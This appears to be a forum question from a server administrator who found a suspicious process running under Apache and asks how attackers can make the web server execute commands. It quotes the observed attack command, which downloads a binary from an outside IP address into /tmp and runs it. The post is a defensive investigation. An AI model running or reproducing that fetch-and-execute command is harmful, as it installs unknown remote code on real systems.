executing commands as apache
I run PHP as module on my apache, and sometimes I find things like that on my "ps -auxw | grep apache":
sh -c cd /tmp;wget http://222.235.73.39/http;chmod +x http;./http
1) it's probably not runned by a PHP script (since it wouldn't open a new process for it)
2) I grepd all the domain logs for the IP or hostname (when they use host) and didn't find anything
3) I checked all ports binded by apache to check if they exploiter isn't running a shell and executing the commands thru it... nothing found
so... how can these commands be executed by apache?
which other ways they can make apache execute things?!
